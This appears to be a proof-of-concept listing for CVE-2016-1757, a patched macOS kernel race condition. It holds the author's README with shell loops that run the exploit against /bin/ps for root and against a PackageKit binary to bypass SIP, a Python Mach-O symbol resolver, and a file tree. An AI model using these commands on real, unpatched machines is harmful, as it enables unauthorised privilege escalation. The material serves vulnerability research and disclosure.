
CVE-2016-1757 PoC: Apple iOS and OS X kernel race condition vulnerability

Associated Vulnerability
Title: Apple iOS and OS X kernel race condition vulnerability (CVE-2016-1757)
Description: Apple iOS and OS X are both products of Apple Inc. (USA). The former is an operating system developed for mobile devices; the latter is a dedicated operating system developed for Mac computers. Kernel is a core component of both. A race condition vulnerability exists in the kernel of Apple iOS before 9.3 and OS X before 10.11.4. An attacker can exploit it via a specially crafted application to execute arbitrary code with elevated privileges.
Description
Exploit code for CVE-2016-1757
Readme
Mach Race OS X Local Privilege Escalation Exploit

(c) fG! 2015, 2016, reverser@put.as - https://reverse.put.as

----------------

A SUID, SIP, and binary entitlements universal OS X exploit (CVE-2016-1757).

----------------

Usage against a SUID binary:

./mach_race_server /bin/ps _compat_mode

for i in `seq 0 1000000`; do ./mach_race_client /bin/ps; done

Against an entitled binary to bypass SIP:

./mach_race_server /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/system_shove _geteuid

for i in `seq 0 1000000`; do ./mach_race_client /System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/system_shove; done

Note: because the service name is fixed, you can't chain this exploit from user to root and then run it again to bypass SIP: bootstrap_register2 will fail the second time, since the service is already registered with launchd from the first run. The fix is, for example, to add a parameter that selects a different service name.

Note2: there's no need to split this into two separate apps; a single binary works, you just need to fork a server and a client.
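In both usage lines above, mach_race_server is given the target binary and the name of a symbol in it (`_compat_mode`, `_geteuid`), so locating that symbol's address inside the Mach-O image is the first thing such a server has to do. The following Python is an added example, not fG!'s code and not taken from the PoC sources in the snapshot below: it walks the load commands, reads LC_SYMTAB, and returns the symbol's virtual address and file offset. The Mach-O it parses is constructed inline for the test; it handles thin 64-bit images only (fat and 32-bit headers are left out, an assumption of this example), and in a live, slid process the ASLR slide would still have to be added to the returned vmaddr. How the real exploit obtains the task port and what it writes at that address is covered by the references, not here.

```python
import struct

# Mach-O constants from <mach-o/loader.h> and <mach-o/nlist.h>
MH_MAGIC_64 = 0xFEEDFACF
LC_SEGMENT_64 = 0x19
LC_SYMTAB = 0x02
N_TYPE = 0x0E     # mask for the symbol type bits in n_type
N_SECT = 0x0E     # symbol is defined in a section (has an address)
N_EXT = 0x01      # external symbol


def parse_macho64(data):
    """Return (segments, symtab) for a thin 64-bit Mach-O image.

    segments: list of (segname, vmaddr, vmsize, fileoff, filesize)
    symtab:   (symoff, nsyms, stroff, strsize) or None if no LC_SYMTAB
    """
    magic, _cputype, _cpusub, _ftype, ncmds, _sizeofcmds, _flags, _res = \
        struct.unpack_from("<IiiIIIII", data, 0)
    if magic != MH_MAGIC_64:
        raise ValueError("not a thin 64-bit Mach-O (fat/32-bit images not handled here)")
    segments, symtab = [], None
    off = 32  # sizeof(struct mach_header_64)
    for _ in range(ncmds):
        cmd, cmdsize = struct.unpack_from("<II", data, off)
        if cmdsize < 8 or off + cmdsize > len(data):
            raise ValueError("malformed load command at offset %d" % off)
        if cmd == LC_SEGMENT_64:
            segname, vmaddr, vmsize, fileoff, filesize = \
                struct.unpack_from("<16sQQQQ", data, off + 8)
            segments.append((segname.rstrip(b"\0").decode(), vmaddr, vmsize, fileoff, filesize))
        elif cmd == LC_SYMTAB:
            symtab = struct.unpack_from("<IIII", data, off + 8)
        off += cmdsize
    return segments, symtab


def vmaddr_to_fileoff(segments, vmaddr):
    """Map a virtual address to its file offset via the segment that covers it."""
    for _name, segaddr, segsize, fileoff, filesize in segments:
        if segaddr <= vmaddr < segaddr + segsize:
            delta = vmaddr - segaddr
            return fileoff + delta if delta < filesize else None  # zero-fill part has no bytes on disk
    return None


def resolve_symbol(data, name):
    """Return (vmaddr, fileoff) for a defined symbol such as '_compat_mode', or None.

    The name must be the Mach-O symbol name, i.e. with the leading underscore
    that the C compiler adds, exactly as mach_race_server is invoked above.
    """
    segments, symtab = parse_macho64(data)
    if symtab is None:
        return None
    symoff, nsyms, stroff, strsize = symtab
    want = name.encode()
    for i in range(nsyms):
        n_strx, n_type, _n_sect, _n_desc, n_value = \
            struct.unpack_from("<IBBHQ", data, symoff + 16 * i)  # sizeof(struct nlist_64) == 16
        if n_type & N_TYPE != N_SECT:
            continue  # undefined or indirect symbols carry no address
        start = stroff + n_strx
        end = data.index(b"\0", start)
        if end >= stroff + strsize:
            raise ValueError("symbol string runs past the string table")
        if data[start:end] == want:
            return n_value, vmaddr_to_fileoff(segments, n_value)
    return None


def build_sample_macho():
    """Constructed minimal Mach-O (test data, not a real binary).

    Layout: header(32) + LC_SEGMENT_64(72) + LC_SYMTAB(24) = 128 bytes,
    16 bytes of code, 3 nlist_64 entries, then the string table.
    """
    text_vmaddr = 0x100000000
    code = b"\x55\x48\x89\xe5\x31\xc0\x5d\xc3".ljust(16, b"\x90")  # tiny stand-in function bodies
    symoff = 128 + len(code)                 # 144
    strtab = b"\0_compat_mode\0_main\0_printf\0"
    nlists = (
        struct.pack("<IBBHQ", 1, N_SECT | N_EXT, 1, 0, text_vmaddr + 128 + 8)  # _compat_mode
        + struct.pack("<IBBHQ", 14, N_SECT | N_EXT, 1, 0, text_vmaddr + 128)   # _main
        + struct.pack("<IBBHQ", 20, N_EXT, 0, 0, 0)                            # _printf (undefined)
    )
    stroff = symoff + len(nlists)            # 192
    total = stroff + len(strtab)             # 220
    header = struct.pack("<IiiIIIII", MH_MAGIC_64, 0x01000007, 3, 2, 2, 96, 0, 0)
    seg = struct.pack("<II16sQQQQiiII", LC_SEGMENT_64, 72, b"__TEXT",
                      text_vmaddr, 0x1000, 0, total, 7, 5, 0, 0)
    symtab = struct.pack("<IIIIII", LC_SYMTAB, 24, symoff, 3, stroff, len(strtab))
    return header + seg + symtab + code + nlists + strtab


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 2 else build_sample_macho()
    sym = sys.argv[2] if len(sys.argv) > 2 else "_compat_mode"
    print(sym, resolve_symbol(data, sym))
```

Run with no arguments it resolves `_compat_mode` in the constructed image; `python3 resolve.py /bin/ps _compat_mode` would work on a thin x86_64 binary, but a fat or 32-bit file raises ValueError rather than returning a misleading address.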

----------

References:

https://reverse.put.as/wp-content/uploads/2016/04/SyScan360_SG_2016_-_Memory_Corruption_is_for_wussies.pdf

http://googleprojectzero.blogspot.pt/2016/03/race-you-to-kernel.html

--------------

Tested against Mavericks 10.9.5, Yosemite 10.10.5, El Capitan 10.11.2 and 10.11.3.

Fixed in El Capitan 10.11.4.

Should work with all OS X versions (depending on whether bootstrap_register2 exists on older versions).

An alternative implementation with bootstrap_create_server is possible for older versions.
File Snapshot

[4.0K] /data/pocs/596f9880d5453bb03243e65d7f531bb8c71ec7ff
├── [4.0K] mach_race_client
│   ├── [4.0K] mach_race_client
│   │   └── [6.3K] main.c
│   └── [4.0K] mach_race_client.xcodeproj
│       └── [8.6K] project.pbxproj
├── [4.0K] mach_race_server
│   ├── [4.0K] mach_race_server
│   │   ├── [2.3K] logging.h
│   │   ├── [ 22K] main.c
│   │   ├── [2.5K] simple_ipc_common.h
│   │   ├── [6.0K] utils.c
│   │   └── [2.2K] utils.h
│   └── [4.0K] mach_race_server.xcodeproj
│       └── [8.4K] project.pbxproj
├── [4.0K] mach_race.xcworkspace
│   └── [ 275] contents.xcworkspacedata
└── [1.6K] README.md

7 directories, 10 files